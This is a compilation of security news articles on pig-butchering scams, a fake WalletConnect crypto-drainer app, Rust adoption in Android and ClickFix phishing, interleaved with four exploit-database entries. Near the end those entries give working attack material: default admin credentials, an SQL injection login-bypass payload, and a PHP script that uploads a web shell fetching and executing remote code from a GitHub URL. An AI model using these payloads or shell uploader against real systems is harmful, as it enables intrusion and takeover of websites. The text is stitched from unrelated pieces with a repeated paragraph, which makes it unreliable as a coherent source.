Scamming operations that once originated in Southeast Asia are now proliferating around the world, likely raking in billions of dollars in the process.

More than 200,000 people in Southeast Asia have been forced to run online scams in recent years, often being enslaved and brutalized, as part of criminal enterprises that have netted billions in stolen funds. Such “pig butchering” operations have largely been concentrated in Myanmar, Cambodia, and Laos, typically rooted in Chinese organized crime groups exploiting instability and poor governance in the region. Though they come at great humanitarian cost, pig butchering scams are undeniably lucrative and, perhaps inevitably, similar operations are now being uncovered on multiple continents and in numerous countries around the world.

A WIRED review of law enforcement and civil society action as well as interviews with numerous researchers show that pig butchering operations that are offshoots of the Southeast Asian activity have emerged in the Middle East, Eastern Europe, Latin America, and West Africa. Many of these expanded operations apparently have links to Chinese-speaking criminals or have evolved in parallel to Chinese Belt and Road Initiative investments, the country’s massive international infrastructure and development initiative.

In 2023, the FBI had reports of nearly $4 billion in losses from the scams, and some researchers put all-time total global losses at $75 billion or more. Beijing has made a concerted effort in recent months to crack down on pig butchering schemes and human trafficking to scamming centers in the Southeast Asian region, but the activity is proliferating around the world nonetheless.

“As all sorts of attackers learn that they can make serious money doing this, they’re going to make those pivots,” says Ronnie Tokazowski, a longtime pig butchering researcher and cofounder of the nonprofit Intelligence for Good. “So pig butchering is cropping up in more and more countries. Even with all the interventions researchers and law enforcement have done there is little to no sign of this stopping.”

Pig butchering emerged in the last five years and is a type of scam that involves building seemingly intimate relationships with victims. Attacks often start by texting potential targets out of the blue and getting them talking. Then attackers begin to build a rapport and introduce the idea of a special or unique investment opportunity. Finally, victims send funds—typically cryptocurrency—through a malicious platform meant to look like a legitimate money management service, and attackers must launder the money from there. All of this takes time and careful planning from a large workforce. Experts say people from more than 60 countries have been abducted and trafficked to Southeast Asian scamming compounds that typically operate with thousands of forced workers. And in recent months, scam centers have been detected around the world as well in different configurations and sizes, but with the same goal.

“Organized crime groups have basically taken advantage of a favorable situation, a favorable environment for them related to governance challenges, limited enforcement capacities, limited regulations and legislative frameworks,” says Benedikt Hofmann, the deputy head of the United Nations Office on Drugs and Crime’s Southeast Asia and Pacific office. “All these ingredients you also find in some other places of the world.”

“What we’ve seen is criminal groups who are invested in this region here, looking beyond this region for establishing similar operations,” Hofmann says of the international expansion.

The wealthy, authoritarian city of Dubai, within the United Arab Emirates, has emerged since 2021 as the largest epicenter of pig butchering outside Southeast Asia. According to the UN, international migrants comprise more than 88 percent of the UAE’s population, making a uniquely diverse, and potentially vulnerable, workforce readily available.

“Dubai is both a destination and also a transition country,” says Mina Chiang, the founder and director of Humanity Research Consultancy, a social enterprise focusing on human trafficking. “We can see lots of compounds that are actually operating in Dubai itself.”

In July, Humanity Research Consultancy identified at least six alleged scam compounds believed to be operating around Dubai. The research—based on testimony from forced laborers, data leaked from a cyberattack, and social media posts—identified potential compounds around industrial and investment parks. These operations “to the best of our knowledge are managed by Chinese-speaking criminals,” the research says, adding that they operate in a similar way to compounds in Southeast Asia.

“They call it a typing center. But a huge scam call center,” reads a one-star review left for a location in Dubai on Google Maps. Another says: “Mostly poor people from Africa working there and mosltly jailed in Dubai. No matter how much they offer you everything is scammed. Highly suggest never ever go there.”

Dubai’s police force did not respond to WIRED’s request for comment about potential scam centers located in the city.

Pig butchering operations may have emerged in Dubai because of immigration and workforce dynamics, but in multiple African countries the activity has started to appear because of an existing culture of organized scamming.

In Nigeria, where digital scamming has been a prominent illicit industry for years across numerous platforms, it was all but inevitable that attackers would adopt the conceits and tactics of pig butchering. The scheme is mature enough that there are now readily available prefab cryptocurrency investment platforms, templates, and scripts available for sale online to anyone who wants to get started. A gang that is already used to carrying out romance scams or business email compromise schemes could easily adapt to the premise and cadence of pig butchering.

“If you look at West Africa’s history with social engineering stuff, it’s a potent mix,” says Sean Gallagher, principal threat researcher at Sophos. “You’ve got a lot of people who have seen this as a way to make a living, especially in Nigeria. And the technology is easily transferable. We’ve seen pig butchering packages for sale that include fake crypto sites and scripts that appear to be tailored to targeting African victims.”

Nigerian law enforcement have been increasingly pursuing cases and even securing convictions related specifically to pig butchering. Gallagher and Intelligence for Good’s Tokazowski also say that in studying and interacting with scammers, they have seen technical indicators that pig butchering attacks may be coming out of Ghana as well. The US Embassy in Ghana has warned about the potential for financial scams originating in the country.

Pig butchering has cropped up in other regions of Africa as well, with ties to Chinese-speaking criminals. In June, 88 people in Namibia were rescued from a scam center, which had links to Chinese nationals who were reportedly arrested. Meanwhile, local reports also indicated that 22 Chinese nationals were sentenced to jail time in Zambia for their links to local scam centers.

Stephanie Baroud, a criminal intelligence analyst in Interpol’s human trafficking unit, says the policing organization, which has been coordinating law enforcement actions, has seen an increase in international scam centers. Not all of them are linked to criminal groups from Asia.

“While sometimes we are noting a link to Asian groups, there are cases where there haven't been,” Baroud says. In some situations, she says, new pig butchering activity around the world seems to be an offshoot of Southeast Asian operations, but unrelated actors appear to be taking the model and adapting it to their resources and expertise.

The scams have emerged in Eastern Europe as well. At least two “fraudulent call centers” trying to con people into investing in cryptocurrency were uncovered by law enforcement in Georgia this month, with reports saying men from Taiwan were forced into working in the country. Local officials, who did not respond to WIRED’s request for comment, have said in recent years they have prosecuted seven companies involved in call center operations.

Scam compounds have also been broken up in Peru and Sri Lanka. And there has even been alleged trafficking in truly unexpected places like the Isle of Man, a British territory where almost 100 people were working between 2022 and 2023 as part of a pig butchering operation, according to a BBC investigation from August.

“The People’s Republic of China–origin criminal groups that are behind these sophisticated forms of scamming are looking to build networks and hubs all around the globe simply because this is so lucrative,” says Jason Tower, the country director for Burma and a long-time security analyst covering China and Southeast Asia at the United States Institute of Peace.

Pig butchering scam centers rely upon multiple layers of criminality to operate, encompassing the recruitment of trafficked people, running scam centers on a day-to-day basis, the development of technology to scam thousands of people, and the sophisticated money laundering required to process billions of dollars. As Chinese authorities have cracked down on Chinese-speaking criminal organizations operating scam centers across Southeast Asia, the groups have likely continued to spread their operations, albeit at a smaller scale.

“I would say it was an intentional hedging strategy, seemingly to diversify the geographic basis of operation and ultimately ensure business continuity,” says John Wojcik, an organized crime analyst at the United Nations Office on Drugs and Crime. “But at the same time, I think it’s also an immediate reaction to mounting law enforcement pressure and regulatory tightening in this region.”

In addition to the geographic spread of pig butchering operations, researchers note that there has also been a shift in the people targeted by traffickers to “work” in scam compounds. “Over the past two years, the countries targeted for recruitment have gradually shifted westward,” says Eric Heintz, a global analyst at human rights organization International Justice Mission.

Many trafficking victims within the early years of pig butchering were based in Southeast Asian countries, but this soon shifted to South Asian nations such as India and Nepal, Heintz says. “We have since seen recruitment posts targeting East African nations like Kenya and Uganda, and then West African countries like Morocco, and then, most recently, we have seen posts targeting El Salvador.”

As always, the spread and evolution of pig butchering is driven by how profitable it can be. Researchers say that another alarming trend involves people from around the world choosing to go work in scam centers or even being liberated from forced labor and returning to keep working voluntarily. As long as the money keeps coming in, pig butchering will keep spreading around the world.

“Fraud is not being seen as a serious crime—not like drugs, not like terrorism,” Humanity Research Consultancy’s Chiang says. “Globally, we need to start shifting that idea, because it creates the same kind of damage, and maybe even more because the amount of money we're talking about is so huge. We are racing against time.”

The Pig Butchering Invasion Has Begun

Plus: The US Justice Department indicts three Iranians over Trump campaign hack, EU regulators fine Meta $100 million for a password security lapse, and the Tor Project enters a new phase.

Researchers found a vulnerability in a Kia web portal that allowed them to track millions of cars, unlock doors, honk horns, and even start engines in seconds, just by reading the car's license plate. The findings are the latest in a string of web bugs that have impacted dozen of carmakers. Meanwhile, a handful of Tesla Cybertrucks have been outfitted for war and are literally being-battle tested by Chechen forces fighting in Ukraine as part of Russia’s ongoing invasion.

As Israel escalates its attacks on Lebanon, civilians on both sides of the conflict have been receiving ominous text messages—and authorities in each country are accusing the other of psychological warfare. The US government has increasingly condemned Russia-backed media outlets like RT for working closely with Russian intelligence—and many digital platforms have removed or banned their content. But they’re still influential and trusted alternative sources of information in many parts of the world.

And there's more. Each week, we round up the privacy and security news we didn’t cover in depth ourselves. Click the headlines to read the full stories. And stay safe out there.

**New Digital Identity Guidelines Strike Back at Dreadful Password Policies**

A new draft of the US National Institute of Standards and Technology's “Digital Identity Guidelines” finally takes steps to eliminate reviled password management practices that have been shown to do more harm than good. The recommendations, which will be mandatory for US federal government entities and serve as guidelines for everyone else, ban the practice of requiring users to periodically change their account passwords, often every 90 days.

The policy of regularly changing passwords evolved out of a desire to ensure that people weren't choosing easily guessable or reused passwords; but in practice, it causes people to choose simple or formulaic passwords so they will be easier to keep track of. The new recommendations also ban “composition rules,” like requiring a certain number or mix of capital letters, numbers, and punctuation marks in each password. NIST writes in the draft that the goal of the Digital Identity Guidelines is to provide “foundational risk management processes and requirements that enable the implementation of secure, private, equitable, and accessible identity systems.”

**DOJ Indicts Alleged Iranian Hackers Over Trump Campaign Breach**

The US Department of Justice unsealed charges on Friday against three Iranian men who allegedly compromised Donald Trump’s presidential campaign and leaked stolen data to media outlets. Microsoft and Google warned last month that an Iranian state-sponsored hacking group known as APT42 had targeted both the Joe Biden and Donald Trump presidential campaigns, and successfully breached the Trump campaign. The DOJ claims the hackers compromised a dozen people as part of its operation, including a journalist, a human rights advocate, and several former US officials. More broadly, the US government has said in recent weeks that Iran is attempting to interfere in the 2024 election.

“The defendants’ own words made clear that they were attempting to undermine former President Trump’s campaign in advance of the 2024 U.S. presidential election,” Attorney General Merrick Garland said at a press conference on Friday. "We know that Iran is continuing with its brazen efforts to stoke discord, erode confidence in the US electoral process, and advance its malign activities.”

**Irish Regulator Fines Meta More Than $100 Million Over 2019 Password Lapse**

The Irish Data Protection Commission fined Meta €91 million, or roughly $101 million, on Friday for a password storage lapse in 2019 that violated the European Union's General Data Protection Regulation. Following a report by Krebs on Security, the company acknowledged in March 2019 that a bug in its password management systems had caused hundreds of millions of Facebook, Facebook Lite, and Instagram passwords to be stored without protection in plaintext in an internal platform. Ireland's privacy watchdog launched its investigation into the incident in April 2019.

“It is widely accepted that user passwords should not be stored in plaintext, considering the risks of abuse that arise from persons accessing such data," Irish DPC deputy commissioner Graham Doyle said in a statement. “It must be borne in mind that the passwords, the subject of consideration in this case, are particularly sensitive, as they would enable access to users’ social media accounts.”

**The Tor Project and the Tails Privacy Operating System Are Merging**

The digital anonymity nonprofit the Tor Project is merging with privacy- and anonymity-focused Linux-based operating system Tails. Pavel Zoneff, the Tor Project’s communications director, wrote in a blog post on Thursday that the move will facilitate collaboration and reduce costs, while expanding both groups' reach. “Tor and Tails provide essential tools to help people around the world stay safe online,” he wrote. “By joining forces, these two privacy advocates will pool their resources to focus on what matters most: ensuring that activists, journalists, other at-risk and everyday users will have access to improved digital security tools.”

The US Could Finally Ban Inane Forced Password Changes

Cybersecurity researchers have discovered a malicious Android app on the Google Play Store that enabled the threat actors behind it to steal approximately $70,000 in cryptocurrency from victims over a period of nearly five months.
The dodgy app, identified by Check Point, masqueraded as the legitimate WalletConnect open-source protocol to trick unsuspecting users into downloading it.
"Fake

Cybersecurity researchers have discovered a malicious Android app on the Google Play Store that enabled the threat actors behind it to steal approximately $70,000 in cryptocurrency from victims over a period of nearly five months.

The dodgy app, identified by Check Point, masqueraded as the legitimate WalletConnect open-source protocol to trick unsuspecting users into downloading it.

"Fake reviews and consistent branding helped the app achieve over 10,000 downloads by ranking high in search results," the cybersecurity company said in an analysis, adding it's the first time a cryptocurrency drainer has exclusively targeted mobile device users.

Over 150 users are estimated to have fallen victim to the scam, although it's believed that not all users who downloaded the app were impacted by the cryptocurrency drainer.

The campaign involved distributing a deceptive app that went by several names such as "Mestox Calculator," "WalletConnect - DeFi & NFTs," and "WalletConnect - Airdrop Wallet" (co.median.android.rxqnqb).

While the app is no longer available for download from the official app marketplace, data from SensorTower shows that it was popular in Nigeria, Portugal, and Ukraine, and linked to a developer named UNS LIS.

The developer has also been associated with another Android app called "Uniswap DeFI" (com.lis.uniswapconverter) that remained active on the Play Store for about a month between May and June 2023. It's currently not known if the app had any malicious functionality.

However, both apps can be downloaded from third-party app store sources, once again highlighting the risks posed by downloading APK files from other marketplaces.

Once installed, the fake WallConnect app is designed to redirect users to a bogus website based on their IP address and User-Agent string, and if so, redirect them a second time to another site that mimics Web3Inbox.

Users who don't meet the required criteria, including those who visit the URL from a desktop web browser, are taken to a legitimate website to evade detection, effectively allowing the threat actors to bypass the app review process in the Play Store.

Besides taking steps to prevent analysis and debugging, the core component of the malware is a cryptocurrency drainer known as MS Drainer, which prompts users to connect their wallet and sign several transactions to verify their wallet.

The information entered by the victim in each step is transmitted to a command-and-control server (cakeserver\[.\]online) that, in turn, sends back a response containing instructions to trigger malicious transactions on the device and transfer the funds to a wallet address belonging to the attackers.

"Similar to the theft of native cryptocurrency, the malicious app first tricks the user into signing a transaction in their wallet," Check Point researchers said.

"Through this transaction, the victim grants permission for the attacker's address 0xf721d710e7C27323CC0AeE847bA01147b0fb8dBF (the 'Address' field in the configuration) to transfer the maximum amount of the specified asset (if allowed by its smart contract)."

In the next step, the tokens from the victim's wallet are transferred to a different wallet (0xfac247a19Cc49dbA87130336d3fd8dc8b6b944e1) controlled by the attackers.

This also means that if the victim does not revoke the permission to withdraw tokens from their wallet, the attackers can keep withdrawing the digital assets as soon as they appear without requiring any further action.

Check Point said it also identified another malicious app exhibiting similar features "Walletconnect | Web3Inbox" (co.median.android.kaebpq) that was previously available on Google Play Store in February 2024. It attracted more than 5,000 downloads.

"This incident highlights the growing sophistication of cybercriminal tactics, particularly in the realm of decentralized finance, where users often rely on third-party tools and protocols to manage their digital assets," the company noted.

"The malicious app did not rely on traditional attack vectors like permissions or keylogging. Instead, it used smart contracts and deep links to silently drain assets once users were tricked into using the app."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Crypto Scam App Disguised as WalletConnect Steals $70K in Five-Month Campaign

A malicious app disguised as a legitimate WalletConnect tool targeted mobile users on Google Play. The app stole…

A malicious app disguised as a legitimate WalletConnect tool targeted mobile users on Google Play. The app stole crypto assets from unsuspecting victims. Learn how to protect yourself from similar scams.

Check Point Research (CPR) has discovered the first-ever mobile crypto drainer app on Google Play, deceptively posing as the legitimate WalletConnect tool. The app targeted users directly on their mobile devices, stealing around $70,000 from at least 150 victims. This marks the first time a drainer has exclusively targeted mobile device users, using advanced social engineering tactics and sophisticated evasion techniques.

The fake crypto drainer and wallet app (Screenshot: CPR)

This app capitalized on the trusted name “WalletConnect,” a well-known protocol for connecting wallets to Decentralized Applications (dApps). By appearing as a genuine WalletConnect solution, it lured users who were struggling to connect their wallets to Web3 applications using traditional methods into installing it.

Once installed, the app would prompt users to connect their wallets. This seemingly harmless request was a trap. Upon connection, the app would silently activate the MS Drainer, a powerful toolkit designed to steal various crypto assets.

The MS Drainer would then scan the victim’s wallet for valuable assets like tokens and NFTs. It would prioritize stealing the most valuable ones, using clever techniques to minimize fees and avoid detection. The app also employed deceptive tactics to trick users into signing transactions that would grant the attacker permission to withdraw funds.

These transactions appeared legitimate, leading many victims to unknowingly compromise their assets. This process is repeated across multiple blockchain networks, allowing attackers to systematically steal victims’ assets.

The malicious WalletConnect app used advanced social engineering and technical manipulation, exploiting the complexities of the legitimate WalletConnect protocol, to deceive users into thinking it was a safe tool for connecting their cryptocurrency wallets to Web3 applications.

According to Check Point’s detailed technical report shared with Hackread.com ahead of publishing on Thursday, the app also used advanced evasion techniques, such as fake positive reviews, to remain undetected on Google Play’s verification process for nearly five months, causing significant damage. It managed to accumulate over 10,000 downloads and received numerous fake positive reviews, further deceiving potential victims.

Fake reviews (Screenshot: CPR)

This indicates the growing sophistication of cybercriminals in the decentralized finance ecosystem. Crypto drainers, which steal digital assets, are increasingly used by attackers, often using phishing websites and apps that mimic legitimate platforms. This case highlights the importance of user awareness and security in the DeFi space, reminding us yet again that even seemingly legitimate apps can harbour malicious intent.

Commenting on this, Alexander Chailytko, Cyber Security, Research & Innovation Manager at Check Point Software warned Android users to watch out before downloading an app from third-party as well as Google’s very own Google Play or Play Store.

“This incident is a wake-up call for the entire digital asset community as the emergence of the first mobile crypto drainer app on Google Play marks a significant escalation in the tactics used by cybercriminals and the rapidly evolving landscape of cyber threats in decentralized finance,” Alexander explained.

“This research highlights the critical need for advanced, AI-driven security solutions that can detect and prevent such sophisticated threats. Both users and developers must stay informed and take proactive measures to secure their digital assets.”

1.  Trezor Data Breach Exposes Email and Names of 66,000 Users
2.  Pink Drainer Posed as Journalists, Stole $3M from Twitter Users
3.  Hackers Posed as Google Support to Steal $243 Million in Crypto
4.  Apple Approves Fake App Before Real Rabby Wallet, Funds Stolen
5.  Inferno Drainer Phishing Nets Scammers $80M from Crypto Wallets

First Mobile Crypto Drainer on Google Play Steals $70K from Users

Simple Online Banking System version 1.0 suffers from an ignored default credential vulnerability.

    =============================================================================================================================================| # Title     : Simple Online Banking System v1.0 Insecure Settings Vulnerability                                                           || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html                                     |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user = admin & pass = admin123[+] https://www/127.0.0.1/demo/site/loginGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Simple Online Banking System 1.0 Insecure Settings

The number of memory bugs in Android declined sharply after Google began transitioning to Rust for new features in its mobile OS.

Source: quietbits via Shutterstock

The number of memory-related vulnerabilities in Android has dropped sharply over the past five years, thanks to Google's use of a secure-by-design approach that emphasizes the use of memory-safe languages like Rust for most new code.

Memory safety issues like buffer overflows and use-after-free bugs now account for just 24% of all Android vulnerabilities, compared to 76% in 2019. Numbers so far this year suggest a total of 36 Android memory-related vulnerabilities for all of 2024, or roughly half the number as last year and a far cry from 223 flaws in 2019.

**Secure-by Design Approach Pays Off**

In a Sept. 25 blog post, researchers from Google's Android and security teams credited the progress to Safe Coding, a secure-by-design approach at the company that prioritizes memory-safe languages like Rust for new code development. "Based on what we've learned, it's become clear that we do not need to throw away or rewrite all our existing memory-unsafe code," the researchers wrote. "Instead, Android is focusing on making interoperability safe and convenient as a primary capability in our memory safety journey."

Memory safety vulnerabilities have traditionally accounted for, and continue to account for, more than 60% of all application software vulnerabilities. They have also been disproportionately severe when compared to other flaws. For instance, in 2022, memory-related bugs made up only 36% of all identified Android vulnerabilities but accounted for 86% of the most severe flaws in the operating system and 78% of confirmed exploited Android bugs.

Much of this has to do with how widely used programming languages such as C and C++ allow software developers to directly manipulate memory, leaving the door open for errors to creep in. In contrast, memory-safe languages like Rust, Go, and C# feature automatic memory management and built-in safety checks against common memory-related bugs. Numerous security stakeholders including the US Cybersecurity and Infrastructure Security Agency (CISA) and even the White House have raised concerns over heightened security exposure associated with using memory-unsafe languages and the substantial costs involved in addressing them. While the shift to memory-safe languages has been slowly gaining momentum, many expect it will take years and possibly decades to move existing code bases entirely to memory-safe code.

**A Gradual Transition**

Google's approach to the problem has been to use memory-safe languages like Rust for new Android features while leaving existing code largely untouched except to make bug fixes. The result is that over the past few years there has been a gradual slowdown in new development activity involving memory-unsafe languages matched by an increase in memory-safe development activity, the two Google researchers said.

Google began the transition with support for Rust in Android 12 and has been gradually increasing use of the programming language within the Android Open Source Project. Android 13 marked the first time that most of the new code in the operating system was in a memory-safe language. At the time, Google emphasized that its goal was not to convert all C and C++ code to Rust, but instead to gradually transition to the new programming language over time.

In a blog post earlier this year, members of Google's security engineering team noted that they saw "no realistic path for an evolution of C++ into a language with rigorous memory safety guarantees." But rather than walking away from it all at once, Google will continue to invest in tools to improve memory safety in C and C++ to support the company's existing codebases written in these languages.

Significantly, Google found that memory-related bugs as a percentage of all Android vulnerabilities declined not just because of the company's growing use of a memory-safe language like Rust but also because older vulnerabilities decayed with time. The researchers found that the number of vulnerabilities in a given amount of code — often referred to as vulnerability density — was lower in five-year-old Android code compared to brand new code.

"The problem is overwhelmingly with new code, necessitating a fundamental change in how we develop code," the researchers said.

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Memory-Safe Code Adoption Has Made Android Safer

Companies in this industry vertical tend toward large financial transactions with partners, suppliers, and customers.

Source: devilmaya via Alamy Stock Photo

A small group of transportation and logistics companies in North America has been targeted in cunning business email compromise (BEC) attacks.

Since May, an unknown threat actor has weaponized at least 15 email accounts associated with its targeted companies. In a blog published on Sept. 24, Proofpoint researchers could not say how the threat actor first obtained access to these accounts. What is known is that the attacker is using the accounts to bury initial access malware inside of existing email chains, betting that recipients will have their guards down so deep into ongoing conversations with colleagues.

"Thread hijacking is obviously very effective," says Daniel Blackford, director of threat research for Proofpoint. "Once an account takeover has happened, this increased legitimacy makes it much harder for anyone but those who are the most vigilant" to spot it.

**Bespoke Phishing Attacks**

From May to July, the threat actor primarily hid payloads inside of Google Drive files leading to Internet shortcut (URL) files. When executed, the attack chain uses server message block (SMB) to retrieve an executable file from a remote share, which installs one of a number of different, known malware tools. Among them: Lumma, the most common infostealer in the world today; StealC; and the legitimate tool NetSupport.

In August, the attacker shifted to using the "ClickFix" technique for tricking victims into downloading its malware. With ClickFix, a malicious webpage presents the victim with a fake pop-up error message. Through a series of dialogue boxes, the victim is instructed to copy and paste a supposed fix for the issue into a PowerShell terminal or Windows Run. In fact, the so-called fix is a script, which downloads and runs an executable. In these recent phishing attempts, the executables for download included DanaBot and Arechclient2 (aka SectopRAT).

Why ClickFix works at all — despite asking for much more active engagement and technical monkeying from the victim — can seem confounding.

"The human psychology behind why really convoluted attack chains work continues to astonish me on a yearly basis," Blackford admits. He does, though, have a theory. "Something that I've heard is that it can be annoying to deal with IT, so if the 'solution' is right in front of you, and you don't have to communicate with a help desk and have people remote into your to your system to fix them, then maybe it's actually less trouble to just try to execute it yourself."

**Why Transport and Logistics Make Attractive Targets**

Various threat actors have disguised ClickFix behind fake Windows and Chrome updates. In this case, the attacker impersonated Samsara, AMB Logistics, and Astra TMS, platforms highly specialized for fleet and freight management, demonstrating the highly targeted nature of the campaign.

As Blackford notes, transport and logistics companies can make attractive targets for financially motivated cyberattacks. "They do business with lots of entities — suppliers for a lot of industrial manufacturers, for example," he says. "They're going to be corresponding with a lot of different companies. There's going to be a lot of moving parts — a lot of things in and out, constantly moving — so a lot of opportunities to find connected, future victims from just one company."

With fertile ground to sneak in amongst the many moving players and deals, he notes, "There are requests for quotes and invoices that are of a fairly large magnitude — that are, in terms of the finances involved, maybe an order of magnitude higher than in some other industries."

He adds that, while rare, "There also is some evidence recently of threat actors trying to redirect legitimate shipments to locations that are under their control."

**About the Author**

Nate Nelson is a freelance writer based in New York City. Formerly a reporter at Threatpost, he contributes to a number of cybersecurity blogs and podcasts. He writes "Malicious Life" -- an award-winning Top 20 tech podcast on Apple and Spotify -- and hosts every other episode, featuring interviews with leading voices in security. He also co-hosts "The Industrial Security Podcast," the most popular show in its field.

Transport, Logistics Orgs Hit by Stealthy Phishing Gambit

SchoolPlus version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    =============================================================================================================================================| # Title     : SchoolPlus v1.0 Auth By Pass Vulnerability                                                                                  || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : http://webpay.com.np/#Product                                                                                               |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pass = ' or 0=0 ##[+] Panel : http://127.0.0.1/jamiatulamanepal.orgnp/cms/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

SchoolPlus 1.0 SQL Injection

School Log Management System version 1.0 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : School Log Management System 1.0 code injection Vulnerability                                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.sourcecodester.com/sites/default/files/download/oretnom23/school-log-management-system_1.zip                    |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This payload injects php code of your choice into an SHELL.php file. [+] Line 28    Line 37  [+] change the path of the script folder.[+] save payload as poc.php[+] usage from cmd : C:\www\test>php 1.php 127.0.0.1[+] payload :<?phpfunction file_upload($target_ip) {    $file_name = "indoushka.php";    $webshell_payload = "<?php        \$url = 'https://raw.githubusercontent.com/indoushka/txt/main/indoushka.txt';        \$ch = curl_init();        curl_setopt(\$ch, CURLOPT_URL, \$url);        curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, true);        \$output = curl_exec(\$ch);        curl_close(\$ch);        if (\$output) {            include 'data://text/plain;base64,' . base64_encode(\$output);        }    ?>";    $post_fields = array(                'name' => 'Hacked By Indoushka',        'email' => 'indoushka4ever@gmail.com',    'contact' => '00213771818860',    'img' => new CURLFile('data://text/plain;base64,' . base64_encode($webshell_payload), 'application/x-php', $file_name),        'qty' => '1'    );    $ch = curl_init();    curl_setopt($ch, CURLOPT_URL, "http://$target_ip/slms/admin/ajax.php?action=save_settings");    curl_setopt($ch, CURLOPT_POST, 1);    curl_setopt($ch, CURLOPT_POSTFIELDS, $post_fields);    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);    $response = curl_exec($ch);    curl_close($ch);    echo "(+) Shell uploaded successfully.\n";    echo "(+) Access the shell at: http://$target_ip/slms/admin/assets/uploads/\n";}if ($argc != 2) {    echo "(+) Usage: php " . $argv[0] . " <target ip>\n";    echo "(+) Example: php " . $argv[0] . " 10.0.0.1\n";    exit(-1);}$target_ip = $argv[1];file_upload($target_ip);Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

School Log Management System 1.0 Code Injection

School Dormitory Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : School Dormitory Management System v1.0 Insecure Settings Vulnerability                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                   || # Vendor    : https://www.sourcecodester.com/user/257130/activity                                                                |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = admin123[+] https://www/127.0.0.1/yoruanwitness000webhostappcom/admin/?page=clientsGreetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Tag

#google